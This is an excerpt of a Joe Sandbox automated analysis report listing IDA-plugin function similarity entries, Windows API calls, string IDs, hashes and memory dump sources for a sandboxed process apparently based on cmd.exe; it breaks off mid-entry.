                                                                                          Similarity
                                                                                          • API ID: Enum$Openwcsrchr
                                                                                          • String ID: %s=%s$.$\Shell\Open\Command
                                                                                          • API String ID: 3402383852-1459555574
                                                                                          • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                          • Instruction ID: de9aa223e584927818a56efc5ae29e946791a1c024a65473f014f2a003b068a0
                                                                                          • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                          • Instruction Fuzzy Hash: EFA1B172A0A683A3EE109B59E4502BAE2A0FF85BD0F944531DA4E877D5EF7CED41D300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$wcscmp
                                                                                          • String ID: %s
                                                                                          • API String ID: 243296809-3043279178
                                                                                          • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                          • Instruction ID: 269e0ad1386bfb1413ca2fdf6a876ec6c0e71df9f0a399257e0e315a2ce8a572
                                                                                          • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                          • Instruction Fuzzy Hash: FCA17E32B0AB87A6EB65DB21D8903F963A0FB48749F144036DA4D87795EF3CE649D300
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • wcschr.MSVCRT(?,?,?,00007FF6A0E799DD), ref: 00007FF6A0E79A39
                                                                                            • Part of subcall function 00007FF6A0E7DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF6A0E7CEAA), ref: 00007FF6A0E7DFB8
                                                                                            • Part of subcall function 00007FF6A0E7DF60: RtlFreeHeap.NTDLL ref: 00007FF6A0E7DFCC
                                                                                            • Part of subcall function 00007FF6A0E7DF60: _setjmp.MSVCRT ref: 00007FF6A0E7E03E
                                                                                          • wcschr.MSVCRT(?,?,?,00007FF6A0E799DD), ref: 00007FF6A0E79AF0
                                                                                          • wcschr.MSVCRT(?,?,?,00007FF6A0E799DD), ref: 00007FF6A0E79B0F
                                                                                            • Part of subcall function 00007FF6A0E796E8: memset.MSVCRT ref: 00007FF6A0E797B2
                                                                                            • Part of subcall function 00007FF6A0E796E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6A0E79880
                                                                                          • _wcsupr.MSVCRT ref: 00007FF6A0E8B844
                                                                                          • wcscmp.MSVCRT ref: 00007FF6A0E8B86D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                          • String ID: FOR$ IF
                                                                                          • API String ID: 3663254013-2924197646
                                                                                          • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                          • Instruction ID: aca1efef3432236f12edc8d61b4727c8b43886cbee9c64109d6b98edc9748058
                                                                                          • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                          • Instruction Fuzzy Hash: EA51AC31F0BB43A6FE58AB25945027966A1FF89B90F584235DA1ED77D2DE3CE805A300
                                                                                          APIs
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F0D6
                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1BA
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F1E7
                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1FF
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F2BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                          • String ID: )$=,;
                                                                                          • API String ID: 1959970872-2167043656
                                                                                          • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                          • Instruction ID: 63000e758ed284127b4c02d36b41793333cbdfab48e23bb45371ff7b1af3f81f
                                                                                          • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                          • Instruction Fuzzy Hash: FF41CF72E0B253E6FBA08B15E55437976E0BF55751F849035CE8CC23A2DF3CA8A1A700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                          • API String ID: 3249344982-2616576482
                                                                                          • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                          • Instruction ID: 6eadcb6025df01fe4c7fa27d6582fe5b37bf05511ad17e51780853cc84aa3839
                                                                                          • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                          • Instruction Fuzzy Hash: 47417172619B8296E3108F21A84436ABAA4FB8DBD5F448235EA4D87794CF7DD4199B00
                                                                                          APIs
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86A73
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86A91
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86AB0
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86AE3
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86B01
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$iswdigit
                                                                                          • String ID: +-~!$<>+-*/%()|^&=,
                                                                                          • API String ID: 2770779731-632268628
                                                                                          • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                          • Instruction ID: b03abbd8d4413db24ecdd0d70715ae4dda8eedd753cfafcf4aadb48eb9535333
                                                                                          • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                          • Instruction Fuzzy Hash: 3931F932A0AA57A5EB549F51E45027977F0FB89F89F558135DA4E83394EF3CE408E310
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E81673
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E8168D
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E81757
                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E8176E
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E81788
                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E8179C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$Alloc$Size
                                                                                          • String ID:
                                                                                          • API String ID: 3586862581-0
                                                                                          • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                          • Instruction ID: 33246000a8bbe347cd3cb99fae34ea1e1714bfbfd4575d5a17ad16b855c513bc
                                                                                          • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                          • Instruction Fuzzy Hash: BF917C72A0AB43A2EA158B15E440379B7E4FB49B90F598136DE4D837A0DF3CE449E340
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                          • String ID:
                                                                                          • API String ID: 1313749407-0
                                                                                          • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                          • Instruction ID: a159577ad3e3f8a6b951397a439d883a06b6326ea77635c09b315f45b4eee1e7
                                                                                          • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                          • Instruction Fuzzy Hash: CC51C632E0B6C362FA549B26A904279A6A5FF49B90F685235DD1EC77D1DF3CE844A300
                                                                                          APIs
                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1BA
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F1E7
                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1FF
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F2BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                          • String ID: )$=,;
                                                                                          • API String ID: 1959970872-2167043656
                                                                                          • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                          • Instruction ID: 0503932f051479bb815cb9a7ece32915a1e1ab91501cf47de9e6529ac61de533
                                                                                          • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                          • Instruction Fuzzy Hash: 2F41BB75E0B253F6FBA48B10E9483793AE0BF51741F949036C98DC23A2CF3CA860B601
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnicmpfprintfwcsrchr
                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                          • API String ID: 3625580822-2781220306
                                                                                          • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                          • Instruction ID: a79771e769768a57ffc97fdaae4fbe133e6044ca0ce2d491a3eb4a948bb38108
                                                                                          • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                          • Instruction Fuzzy Hash: C931D031A0A747B2EA149B56B5001BAB2A5BF49BD4F544130DE1D977E2EF3CE885D300
                                                                                          APIs
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E93687
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E936A6
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E936EB
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E93703
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E93722
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Write_get_osfhandle$Mode
                                                                                          • String ID:
                                                                                          • API String ID: 1066134489-0
                                                                                          • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                          • Instruction ID: 73c792fde4408378a025d8589b62d9eb947dd8efffbc27026893511012d40255
                                                                                          • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                          • Instruction Fuzzy Hash: 68519E76B0A643B6EA249F31A80457AE6A1FB88BD1F084535DE1A83791DF3CE440EB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                          • String ID: KEYS$LIST$OFF
                                                                                          • API String ID: 411561164-4129271751
                                                                                          • Opcode ID: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                                                                                          • Instruction ID: 6a3b02b9e64ea46636b1127b0b904e0c9717b4375da18d8aa271bd9dec88a0bf
                                                                                          • Opcode Fuzzy Hash: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                                                                                          • Instruction Fuzzy Hash: A8217F30A0AA07F2F7549B25A9411B5A6B5FF89790F509631D61EC73F5EF3CE844A700
                                                                                          APIs
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E801C4
                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E801D6
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E80212
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E80228
                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E8023C
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E80251
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 513048808-0
                                                                                          • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                          • Instruction ID: 17298b8667e8164354487566bbfae7d0d2ff77266ff71ca776e76e79c8056672
